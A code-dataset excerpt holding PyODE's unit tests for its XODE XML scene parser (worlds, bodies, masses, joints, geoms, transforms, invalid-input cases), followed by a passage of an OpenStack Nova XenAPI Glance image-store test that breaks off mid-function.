repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
coiax/pyode | tests/test_xode.py | 2 | 30688 | #!/usr/bin/env python
######################################################################
# Python Open Dynamics Engine Wrapper
# Copyright (C) 2004 PyODE developers (see file AUTHORS)
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of EITHER:
# (1) The GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at
# your option) any later version. The text of the GNU Lesser
# General Public License is included with this library in the
# file LICENSE.
# (2) The BSD-style license that is included with this library in
# the file LICENSE-BSD.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the files
# LICENSE and LICENSE-BSD for more details.
######################################################################
import unittest
import ode
import math
from xode import node, transform, parser, errors
test_doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode>
<world name="world1">
<transform>
<matrix4f m00="1.0" m01="2.0" m02="3.0" m03="4.0"
m10="1.2" m11="2.2" m12="3.2" m13="4.2"
m20="1.4" m21="2.4" m22="3.4" m23="4.4"
m30="1.8" m31="2.8" m32="3.8" m33="4.8"/>
</transform>
<space name="space1">
<body name="body0">
<mass name="mass0" />
</body>
<body name="body1" enabled="false" gravitymode="0">
<transform scale="2.0">
<position x="10.0" y="11.0" z="12.0"/>
<rotation>
<euler x="45.0" y="45.0" z="45.0" aformat="radians"/>
</rotation>
</transform>
<torque x="1.0" y="2.0" z="3.0"/>
<force x="2.0" y="3.0" z="4.0"/>
<finiteRotation mode="1" xaxis="1.0" yaxis="1.0" zaxis="1.0"/>
<linearVel x="1.0" y="2.0" z="3.0"/>
<angularVel x="3.0" y="2.0" z="1.0"/>
<mass name="mass1">
<mass_shape density="1.0">
<sphere radius="1.0"/>
</mass_shape>
<mass name="mass2">
<mass_shape density="2.0">
<sphere radius="10.0"/>
</mass_shape>
<adjust total="4.0"/>
</mass>
</mass>
<joint name="joint1">
<ball>
<anchor x="1.0" y="2.0" z="3.0"/>
</ball>
</joint>
<geom name="geom1">
<box sizex="10" sizey="20" sizez="30"/>
</geom>
</body>
<body name="body2">
<joint name="joint2">
<link1 body="body1"/>
<ball/>
</joint>
</body>
<joint name="joint3">
<link1 body="body1"/>
<link2 body="body2"/>
<ball/>
</joint>
</space>
</world>
<world name="world2">
<space>
<body name="body3">
<transform>
<matrix4f m00="1.0" m01="0.0" m02="0.0" m03="0.0"
m10="0.0" m11="1.0" m12="0.0" m13="0.0"
m20="0.0" m21="0.0" m22="1.0" m23="0.0"
m30="10.0" m31="20.0" m32="30.0" m33="0.0"/>
</transform>
</body>
<body name="body4">
<transform>
<position x="1" y="1" z="1"/>
</transform>
<body name="body5">
<transform>
<position x="2" y="2" z="2"/>
</transform>
</body>
</body>
<body name="body6">
<transform>
<rotation>
<euler x="0" y="0" z="0.78" aformat="radians"/>
</rotation>
</transform>
<body name="body7">
<transform absolute="true">
<matrix4f m00="1.0" m01="2.0" m02="3.0" m03="4.0"
m10="1.2" m11="2.2" m12="3.2" m13="4.2"
m20="1.4" m21="2.4" m22="3.4" m23="4.4"
m30="1.8" m31="2.8" m32="3.8" m33="4.8"/>
</transform>
<geom name="geom6">
<transform>
<position x="1.0" y="2.0" z="3.0"/>
<rotation>
<euler x="0.78" y="0" z="0" aformat="radians"/>
</rotation>
</transform>
<sphere radius="1.0"/>
</geom>
</body>
</body>
<geom name="geom2">
<cappedCylinder radius="15.0" length="3.0"/>
</geom>
<geom name="geom3">
<ray length="11.0"/>
<geom name="geom4">
<plane a="0.0" b="1.0" c="0.0" d="17.0"/>
</geom>
<geom name="geom5">
<transform>
<position x="1.0" y="2.0" z="3.0"/>
<rotation>
<euler x="0.0" y="0.0" z="0.78" aformat="radians"/>
</rotation>
</transform>
<sphere radius="23.0"/>
</geom>
</geom>
<joint name="joint4">
<link1 body="body4"/>
<link2 body="body6"/>
<fixed/>
</joint>
<joint name="joint5">
<link1 body="body4"/>
<link2 body="body6"/>
<hinge>
<axis x="1.0" y="0.0" z="0.0"/>
</hinge>
</joint>
<joint name="joint6">
<link1 body="body4"/>
<link2 body="body6"/>
<slider>
<axis x="0.0" y="1.0" z="0.0"
LowStop="1.0"
HiStop="2.0"
Vel="3.0"
FMax="4.0"
FudgeFactor="0.5"
Bounce="6.0"
CFM="7.0"
StopERP="8.0"
StopCFM="9.0" />
</slider>
</joint>
<joint name="joint7">
<link1 body="body4"/>
<link2 body="body6"/>
<universal>
<axis x="1.0" y="0.0" z="0.0"/>
<axis x="0.0" y="1.0" z="0.0"/>
</universal>
</joint>
<joint name="joint8">
<link1 body="body4"/>
<link2 body="body6"/>
<hinge2>
<axis x="0.0" y="0.0" z="1.0"
SuspensionERP="2.0"
SuspensionCFM="3.0" />
<axis x="0.0" y="1.0" z="0.0"
FudgeFactor="0.2" />
</hinge2>
</joint>
<joint name="joint9">
<link1 body="body4"/>
<link2 body="body6"/>
<amotor>
<axis x="0.0" y="1.0" z="0.0"/>
</amotor>
</joint>
<joint name="joint10">
<link1 body="body4"/>
<link2 body="body6"/>
<amotor>
<axis x="1.0" y="0.0" z="0.0"/>
<axis x="0.0" y="1.0" z="0.0"/>
<axis x="0.0" y="0.0" z="1.0"/>
</amotor>
</joint>
</space>
</world>
</xode>'''
trimesh_doc='''<?xml version="1.0" encoding="iso-8859-1"?>
<xode>
<world>
<space>
<geom name="trimesh1">
<trimesh>
<vertices>
<v x="0" y="1" z="1" />
<v x="1" y="2" z="2" />
<v x="2" y="0" z="1" />
<v x="0" y="1" z="2" />
<v x="2" y="2" z="1" />
</vertices>
<triangles>
<t ia="1" ib="2" ic="3" />
<t ia="2" ib="1" ic="4" />
<t ia="3" ib="2" ic="1" />
</triangles>
</trimesh>
</geom>
</space>
</world>
</xode>
'''
def feq(n1, n2, error=0.1):
"""
Compare two floating point numbers. If the differ by less than C{error},
return True; otherwise, return False.
"""
n = math.fabs(n1 - n2)
if (n <= error):
return True
else:
return False
class Class1:
pass
class Class2:
pass
class TestTreeNode(unittest.TestCase):
def setUp(self):
self.node1 = node.TreeNode('node1', None)
self.node2 = node.TreeNode('node2', self.node1)
self.node3 = node.TreeNode('node3', self.node2)
self.node4 = node.TreeNode('node4', self.node3)
self.t2 = transform.Transform()
self.t2.scale(2.0, 3.0, 4.0)
self.node2.setNodeTransform(self.t2)
self.t3 = transform.Transform()
self.t3.rotate(1.0, 2.0, 3.0)
self.node3.setNodeTransform(self.t3)
self.t4 = transform.Transform()
self.t4.translate(2.0, 3.0, 1.0)
self.node4.setNodeTransform(self.t4)
self.node1.setODEObject(Class2())
self.node2.setODEObject(Class2())
self.node3.setODEObject(Class1())
def testGetName(self):
self.assertEqual(self.node1.getName(), 'node1')
def testGetParent(self):
self.assertEqual(self.node2.getParent(), self.node1)
def testGetChildren(self):
self.assertEqual(self.node1.getChildren(), [self.node2])
self.assertEqual(self.node2.getChildren(), [self.node3])
self.assertEqual(self.node3.getChildren(), [self.node4])
self.assertEqual(self.node4.getChildren(), [])
def testNamedChildLocal(self):
self.assertEqual(self.node1.namedChild('node2'), self.node2)
def testNamedChildRemote(self):
self.assertEqual(self.node1.namedChild('node3'), self.node3)
def testNamedChildNotFound(self):
self.assertRaises(KeyError, self.node1.namedChild, 'undefined')
def testGetFirstAncestor(self):
self.assertEqual(self.node3.getFirstAncestor(Class2), self.node2)
def testGetFirstAncestorNotFound(self):
self.assertRaises(node.AncestorNotFoundError,
self.node3.getFirstAncestor, Class1)
def testInitialTransform(self):
t = transform.Transform()
t.setIdentity()
self.assertEqual(self.node1.getNodeTransform().m, t.m)
def testGetTransform(self):
ref = self.node1.getNodeTransform() * self.t2 * self.t3
self.assertEqual(self.node3.getTransform().m, ref.m)
def testGetTransformUntil(self):
ref = self.t3 * self.t4
self.assertEqual(self.node4.getTransform(self.node2).m, ref.m)
class TestParser(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
self.root = self.p.parseString(test_doc)
def assertEqualf(a, b):
self.assertEqual(feq(a, b), True)
self.assertEqualf = assertEqualf
class TestWorldParser(TestParser):
def testInstance(self):
world = self.root.namedChild('world1').getODEObject()
self.assert_(isinstance(world, ode.World))
class TestSpaceParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.simpleSpace = self.root.namedChild('space1').getODEObject()
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<space name="space1"/>
</world></xode>
'''
self.p2 = parser.Parser()
self.p2.setParams(spaceFactory=ode.HashSpace)
self.root2 = self.p2.parseString(doc)
self.hashSpace = self.root2.namedChild('space1').getODEObject()
def makeSpace():
return ode.QuadTreeSpace((0, 0, 0), (2, 2, 2), 3)
self.p3 = parser.Parser()
self.p3.setParams(spaceFactory=makeSpace)
self.root3 = self.p3.parseString(doc)
self.quadSpace = self.root3.namedChild('space1').getODEObject()
def testSimpleInstance(self):
self.assert_(isinstance(self.simpleSpace, ode.SimpleSpace))
def testHashInstance(self):
self.assert_(isinstance(self.hashSpace, ode.HashSpace))
def testQuadInstance(self):
self.assert_(isinstance(self.quadSpace, ode.QuadTreeSpace))
def testSpaceBase(self):
self.assert_(isinstance(self.simpleSpace, ode.SpaceBase))
self.assert_(isinstance(self.hashSpace, ode.SpaceBase))
self.assert_(isinstance(self.quadSpace, ode.SpaceBase))
class TestBodyParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.body1 = self.root.namedChild('body1').getODEObject()
self.body3 = self.root.namedChild('body3').getODEObject()
self.body6 = self.root.namedChild('body6').getODEObject()
def testInstance(self):
self.assert_(isinstance(self.body1, ode.Body))
def testRotation(self):
ref = transform.Transform()
ref.rotate(0.0, 0.0, 0.78)
rot = self.body6.getRotation()
for n1, n2 in zip(ref.getRotation(), rot):
self.assert_(feq(n1, n2))
def testPosition(self):
self.assertEqual(self.body3.getPosition(), (10.0, 20.0, 30.0))
def testEnable(self):
self.assertEqual(self.body1.isEnabled(), 0)
def testGravityMode(self):
self.assertEqual(self.body1.getGravityMode(), 0)
def testTorque(self):
self.assertEqual(self.body1.getTorque(), (1.0, 2.0, 3.0))
def testForce(self):
self.assertEqual(self.body1.getForce(), (2.0, 3.0, 4.0))
def testFiniteRotation(self):
self.assertEqual(self.body1.getFiniteRotationMode(), 1)
x, y, z = self.body1.getFiniteRotationAxis()
self.assertEqual(x, y, z)
def testLinearVel(self):
self.assertEqual(self.body1.getLinearVel(), (1.0, 2.0, 3.0))
def testAngularVel(self):
self.assertEqual(self.body1.getAngularVel(), (3.0, 2.0, 1.0))
class TestMassParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.mass0 = self.root.namedChild('mass0').getODEObject()
self.mass1 = self.root.namedChild('mass1').getODEObject()
self.mass2 = self.root.namedChild('mass2').getODEObject()
self.ref1 = ode.Mass()
self.ref1.setSphere(1.0, 1.0)
self.ref2 = ode.Mass()
self.ref2.setSphere(2.0, 10.0)
self.ref2.adjust(4.0)
def testInstance(self):
self.assert_(isinstance(self.mass1, ode.Mass))
def testDefault(self):
self.assertEqual(self.mass0.c, self.ref1.c)
self.assertEqual(self.mass0.I, self.ref1.I)
self.assertEqual(self.mass0.mass, self.ref1.mass)
def testTotal(self):
self.assertEqual(self.mass2.mass, 4.0)
def testSphere(self):
self.assertEqual(self.ref2.c, self.mass2.c)
self.assertEqual(self.ref2.I, self.mass2.I)
def testAdd(self):
ref = ode.Mass()
ref.setSphere(1.0, 1.0)
ref.add(self.ref2)
self.assertEqual(ref.c, self.mass1.c)
self.assertEqual(ref.I, self.mass1.I)
class TestJointParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.body1 = self.root.namedChild('body1').getODEObject()
self.body2 = self.root.namedChild('body2').getODEObject()
self.joint1 = self.root.namedChild('joint1').getODEObject()
self.joint2 = self.root.namedChild('joint2').getODEObject()
self.joint3 = self.root.namedChild('joint3').getODEObject()
self.joint4 = self.root.namedChild('joint4').getODEObject()
self.joint5 = self.root.namedChild('joint5').getODEObject()
self.joint6 = self.root.namedChild('joint6').getODEObject()
self.joint7 = self.root.namedChild('joint7').getODEObject()
self.joint8 = self.root.namedChild('joint8').getODEObject()
self.joint9 = self.root.namedChild('joint9').getODEObject()
self.joint10 = self.root.namedChild('joint10').getODEObject()
def testBallInstance(self):
self.assert_(isinstance(self.joint1, ode.BallJoint))
def testBodyAncestor(self):
self.assertEqual(self.joint1.getBody(0), self.body1)
def testEnvironment(self):
self.assertEqual(self.joint1.getBody(1), ode.environment)
def testBodyReference(self):
self.assertEqual(self.joint2.getBody(0), self.body1)
def testSpaceParent(self):
self.assertEqual(self.joint3.getBody(0), self.body1)
self.assertEqual(self.joint3.getBody(1), self.body2)
def testBallAnchor(self):
for n1, n2 in zip(self.joint1.getAnchor(), (1.0, 2.0, 3.0)):
self.assert_(feq(n1, n2))
def testFixedInstance(self):
self.assert_(isinstance(self.joint4, ode.FixedJoint))
def testHingeInstance(self):
self.assert_(isinstance(self.joint5, ode.HingeJoint))
def testHingeAxis(self):
self.assertEqual(self.joint5.getAxis(), (1.0, 0.0, 0.0))
def testSliderInstance(self):
self.assert_(isinstance(self.joint6, ode.SliderJoint))
def testSliderAxis(self):
self.assertEqual(self.joint6.getAxis(), (0.0, 1.0, 0.0))
def testUniversalInstance(self):
self.assert_(isinstance(self.joint7, ode.UniversalJoint))
def testUniversalAxis1(self):
ref = (1.0, 0.0, 0.0)
axis1 = self.joint7.getAxis1()
for r, a in zip(ref, axis1):
self.assert_(feq(r, a))
def testUniversalAxis2(self):
ref = (0.0, 1.0, 0.0)
axis2 = self.joint7.getAxis2()
for r, a in zip(ref, axis2):
self.assert_(feq(r, a))
def testHinge2Instance(self):
self.assert_(isinstance(self.joint8, ode.Hinge2Joint))
def testHinge2Axis1(self):
ref = (0.0, 0.0, 1.0)
axis1 = self.joint8.getAxis1()
for r, a in zip(ref, axis1):
self.assert_(feq(r, a))
def testHinge2Axis2(self):
ref = (0.0, 1.0, 0.0)
axis2 = self.joint8.getAxis2()
for r, a in zip(ref, axis2):
self.assert_(feq(r, a))
def testAMotorInstance(self):
self.assert_(isinstance(self.joint9, ode.AMotor))
def testAMotorNumAxes1(self):
self.assertEqual(self.joint9.getNumAxes(), 1)
def testAMotorNumAxes3(self):
self.assertEqual(self.joint10.getNumAxes(), 3)
def testAMotorAxes1(self):
ref = (0.0, 1.0, 0.0)
axis1 = self.joint9.getAxis(0)
self.assertEqual(ref, axis1)
def testAMotorAxes3(self):
ref = [(1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0)]
axes = [self.joint10.getAxis(0), self.joint10.getAxis(1),
self.joint10.getAxis(2)]
self.assertEqual(ref, axes)
def testAxisParamLoStop(self):
self.assertEqualf(self.joint6.getParam(ode.paramLoStop), 1.0)
def testAxisParamHiStop(self):
self.assertEqualf(self.joint6.getParam(ode.paramHiStop), 2.0)
def testAxisParamVel(self):
self.assertEqualf(self.joint6.getParam(ode.paramVel), 3.0)
def testAxisParamFMax(self):
self.assertEqualf(self.joint6.getParam(ode.paramFMax), 4.0)
def testAxisParamFudgeFactor(self):
self.assertEqualf(self.joint6.getParam(ode.paramFudgeFactor), 0.5)
def testAxisParamBounce(self):
self.assertEqualf(self.joint6.getParam(ode.paramBounce), 6.0)
def testAxisParamCFM(self):
self.assertEqualf(self.joint6.getParam(ode.paramCFM), 7.0)
def testAxisParamStopERP(self):
self.assertEqualf(self.joint6.getParam(ode.paramStopERP), 8.0)
def testAxisParamStopCFM(self):
self.assertEqualf(self.joint6.getParam(ode.paramStopCFM), 9.0)
def testAxisParamSuspensionERP(self):
self.assertEqualf(self.joint8.getParam(ode.paramSuspensionERP), 2.0)
def testAxisParamSuspensionCFM(self):
self.assertEqualf(self.joint8.getParam(ode.paramSuspensionCFM), 3.0)
def testAxis2FudgeFactor(self):
self.assertEqualf(self.joint8.getParam(ode.ParamFudgeFactor2), 0.2)
class TestGeomParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.geom1 = self.root.namedChild('geom1').getODEObject()
self.geom2 = self.root.namedChild('geom2').getODEObject()
self.geom3 = self.root.namedChild('geom3').getODEObject()
self.geom4 = self.root.namedChild('geom4').getODEObject()
self.geom5 = self.root.namedChild('geom5').getODEObject()
self.geom6 = self.root.namedChild('geom6').getODEObject()
self.body1 = self.root.namedChild('body1').getODEObject()
self.space1 = self.root.namedChild('space1').getODEObject()
def testSpaceAncestor(self):
self.assertEqual(self.geom1.getSpace(), self.space1)
def testBodyAttach(self):
self.assertEqual(self.geom1.getBody(), self.body1)
def testBoxInstance(self):
self.assert_(isinstance(self.geom1, ode.GeomBox))
def testBoxSize(self):
self.assertEqual(self.geom1.getLengths(), (10.0, 20.0, 30.0))
def testCCylinderInstance(self):
self.assert_(isinstance(self.geom2, ode.GeomCCylinder))
def testCCylinderParams(self):
self.assertEqual(self.geom2.getParams(), (15.0, 3.0))
def testSphereInstance(self):
self.assert_(isinstance(self.geom5, ode.GeomSphere))
def testSphereRadius(self):
self.assertEqual(self.geom5.getRadius(), 23.0)
def testPlaneInstance(self):
self.assert_(isinstance(self.geom4, ode.GeomPlane))
def testPlaneParams(self):
self.assertEqual(self.geom4.getParams(), ((0.0, 1.0, 0.0), 17.0))
def testRayInstance(self):
self.assert_(isinstance(self.geom3, ode.GeomRay))
def testRayLength(self):
self.assertEqual(self.geom3.getLength(), 11.0)
def testIndependantRotation(self):
ref = transform.Transform()
ref.rotate(0.0, 0.0, 0.78)
for n1, n2 in zip(self.geom5.getRotation(), ref.getRotation()):
self.assert_(feq(n1, n2))
def testIndependantPosition(self):
self.assertEqual(self.geom5.getPosition(), (1.0, 2.0, 3.0))
def testTransformInstance(self):
self.assert_(isinstance(self.geom6, ode.GeomTransform))
def testTransformGeomInstance(self):
self.assert_(isinstance(self.geom6.getGeom(), ode.GeomSphere))
def testTransformPosition(self):
pos = self.geom6.getGeom().getPosition()
self.assertEqual(pos, (1.0, 2.0, 3.0))
def testTransformRotation(self):
ref = transform.Transform()
ref.rotate(0.78, 0.0, 0.0)
rot = self.geom6.getGeom().getRotation()
for n1, n2 in zip(rot, ref.getRotation()):
self.assert_(feq(n1, n2))
class TestTransformParser(TestParser):
def setUp(self):
TestParser.setUp(self)
self.world1 = self.root.namedChild('world1')
self.body1 = self.root.namedChild('body1')
self.body5 = self.root.namedChild('body5')
self.body7 = self.root.namedChild('body7')
def testMatrixStyle(self):
t = self.world1.getNodeTransform()
self.assertEqual(t.m, [[1.0, 2.0, 3.0, 4.0],
[1.2, 2.2, 3.2, 4.2],
[1.4, 2.4, 3.4, 4.4],
[1.8, 2.8, 3.8, 4.8]])
def testVector(self):
ref = transform.Transform()
ref.rotate(45.0, 45.0, 45.0)
ref.translate(10.0, 11.0, 12.0)
ref.scale(2.0, 2.0, 2.0)
self.assertEqual(self.body1.getNodeTransform().m, ref.m)
def testAbsolute(self):
t = self.body7.getTransform()
self.assertEqual(t.m, [[1.0, 2.0, 3.0, 4.0],
[1.2, 2.2, 3.2, 4.2],
[1.4, 2.4, 3.4, 4.4],
[1.8, 2.8, 3.8, 4.8]])
def testRelative(self):
t1 = transform.Transform()
t1.translate(1.0, 1.0, 1.0)
t2 = transform.Transform()
t2.translate(2.0, 2.0, 2.0)
t3 = t1 * t2
self.assertEqual(self.body5.getTransform().m, t3.m)
def testMultiply(self):
t1 = transform.Transform()
t2 = transform.Transform()
for r in range(4):
for c in range(4):
t1.m[r][c] = 1
t2.m[r][c] = 2
result = t1 * t2
for r in range(4):
for c in range(4):
self.assertEqual(result.m[r][c], 8)
def testInitialIdentity(self):
t = transform.Transform()
for r in range(4):
for c in range(4):
if (r == c):
self.assertEqual(t.m[r][c], 1)
else:
self.assertEqual(t.m[r][c], 0)
class TestTriMeshParser(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
self.root = self.p.parseString(trimesh_doc)
self.trimesh1 = self.root.namedChild('trimesh1').getODEObject()
def testInstance(self):
self.assert_(isinstance(self.trimesh1, ode.GeomTriMesh))
def testTriangles(self):
triangles = [(1, 2, 3),
(2, 1, 4),
(3, 2, 1)]
vertices = [(0.0, 1.0, 1.0),
(1.0, 2.0, 2.0),
(2.0, 0.0, 1.0),
(0.0, 1.0, 2.0),
(2.0, 2.0, 1.0)]
for i in range(len(triangles)):
tri = self.trimesh1.getTriangle(i)
ref = []
for v in triangles[i]:
ref.append(vertices[v-1])
self.assertEqual(tri, tuple(ref))
class TestInvalid(unittest.TestCase):
def setUp(self):
self.p = parser.Parser()
class TestInvalidTags(TestInvalid):
def testRoot(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<test></test>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testRootChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><test/></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testWorldChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<test/>
</world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testSpaceChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<test/>
</space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testMassChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<body>
<mass>
<test/>
</mass>
</body>
</space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testJointChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><joint><test/></joint></space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testGeomChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><geom><test/></geom></space></world></xode>'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
def testTriMeshChild(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space><geom><trimesh><test/>
</trimesh></geom></space></world></xode>
'''
self.assertRaises(errors.ChildError, self.p.parseString, doc)
class TestInvalidBody(TestInvalid):
def testBadVector(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<torque x="1"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testBodyEnable(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body enabled="unsure">
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testFiniteRotationMode(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<finiteRotation mode="99" xaxis="0" yaxis="0" zaxis="0"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testFiniteRotationAxes(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world>
<body>
<finiteRotation mode="0" xaxis="0" yaxis="0"/>
</body>
</world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
class TestInvalidJoint(TestInvalid):
def testEqualLinks(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<joint>
<ball/>
</joint>
</space></world></xode>'''
# both links are ode.environment
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testNoType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<joint/>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testWrongType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<joint>
<link1 body="body1"/>
<link2 body="space1"/>
<ball/>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testMisplacedReference(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<ball/>
</joint>
<body name="body2"/>
</space></world></xode>'''
# bodies must be defined before the joint
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testSliderAxes(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<body name="body2"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<slider>
</slider>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
def testInvalidParam(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space name="space1">
<body name="body1"/>
<body name="body2"/>
<joint>
<link1 body="body1"/>
<link2 body="body2"/>
<hinge>
<axis x="1.0" y="0.0" z="0.0" TestCFM="99.0"/>
</hinge>
</joint>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
class TestInvalidGeom(TestInvalid):
def testNoType(self):
doc = '''<?xml version="1.0" encoding="iso-8859-1"?>
<xode><world><space>
<geom/>
</space></world></xode>'''
self.assertRaises(errors.InvalidError, self.p.parseString, doc)
if (__name__ == '__main__'):
unittest.main()
| lgpl-2.1 | 129,536,766,369,157,010 | 30.029323 | 76 | 0.559209 | false |
yanheven/nova | nova/tests/unit/virt/xenapi/image/test_glance.py | 33 | 11630 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import time
import mock
from mox3 import mox
from oslo_log import log as logging
from nova.compute import utils as compute_utils
from nova import context
from nova import exception
from nova.tests.unit.virt.xenapi import stubs
from nova.virt.xenapi import driver as xenapi_conn
from nova.virt.xenapi import fake
from nova.virt.xenapi.image import glance
from nova.virt.xenapi import vm_utils
class TestGlanceStore(stubs.XenAPITestBaseNoDB):
def setUp(self):
super(TestGlanceStore, self).setUp()
self.store = glance.GlanceStore()
self.flags(host='1.1.1.1',
port=123,
api_insecure=False, group='glance')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
self.context = context.RequestContext(
'user', 'project', auth_token='foobar')
fake.reset()
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.stubs.Set(
vm_utils, 'get_sr_path', lambda *a, **kw: '/fake/sr/path')
self.instance = {'uuid': 'blah',
'system_metadata': [],
'auto_disk_config': True,
'os_type': 'default',
'xenapi_use_agent': 'true'}
def _get_params(self):
return {'image_id': 'fake_image_uuid',
'glance_host': '1.1.1.1',
'glance_port': 123,
'glance_use_ssl': False,
'sr_path': '/fake/sr/path',
'extra_headers': {'X-Service-Catalog': '[]',
'X-Auth-Token': 'foobar',
'X-Roles': '',
'X-Tenant-Id': 'project',
'X-User-Id': 'user',
'X-Identity-Status': 'Confirmed'}}
def _get_download_params(self):
params = self._get_params()
params['uuid_stack'] = ['uuid1']
return params
def test_download_image(self):
params = self._get_download_params()
self.stubs.Set(vm_utils, '_make_uuid_stack',
lambda *a, **kw: ['uuid1'])
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'download_vhd', **params)
self.mox.ReplayAll()
self.store.download_image(self.context, self.session,
self.instance, 'fake_image_uuid')
self.mox.VerifyAll()
@mock.patch.object(vm_utils, '_make_uuid_stack', return_value=['uuid1'])
@mock.patch.object(random, 'shuffle')
@mock.patch.object(time, 'sleep')
@mock.patch.object(compute_utils, 'add_instance_fault_from_exc')
@mock.patch.object(logging.getLogger('nova.virt.xenapi.client.session'),
'debug')
def test_download_image_retry(self, mock_log_debug, mock_fault, mock_sleep,
mock_shuffle, mock_make_uuid_stack):
params = self._get_download_params()
self.flags(num_retries=2, group='glance')
params.pop("glance_port")
params.pop("glance_host")
calls = [mock.call('glance', 'download_vhd', glance_port=9292,
glance_host='10.0.1.1', **params),
mock.call('glance', 'download_vhd', glance_port=9293,
glance_host='10.0.0.1', **params)]
log_calls = [mock.call(mock.ANY, {'callback_result': '10.0.1.1',
'attempts': 3, 'attempt': 1,
'fn': 'download_vhd',
'plugin': 'glance'}),
mock.call(mock.ANY, {'callback_result': '10.0.0.1',
'attempts': 3, 'attempt': 2,
'fn': 'download_vhd',
'plugin': 'glance'})]
glance_api_servers = ['10.0.1.1:9292',
'http://10.0.0.1:9293']
self.flags(api_servers=glance_api_servers, group='glance')
with (mock.patch.object(self.session, 'call_plugin_serialized')
) as mock_call_plugin_serialized:
error_details = ["", "", "RetryableError", ""]
error = self.session.XenAPI.Failure(details=error_details)
mock_call_plugin_serialized.side_effect = [error, "success"]
self.store.download_image(self.context, self.session,
self.instance, 'fake_image_uuid')
mock_call_plugin_serialized.assert_has_calls(calls)
mock_log_debug.assert_has_calls(log_calls, any_order=True)
self.assertEqual(1, mock_fault.call_count)
def _get_upload_params(self, auto_disk_config=True,
expected_os_type='default'):
params = self._get_params()
params['vdi_uuids'] = ['fake_vdi_uuid']
params['properties'] = {'auto_disk_config': auto_disk_config,
'os_type': expected_os_type}
return params
def _test_upload_image(self, auto_disk_config, expected_os_type='default'):
params = self._get_upload_params(auto_disk_config, expected_os_type)
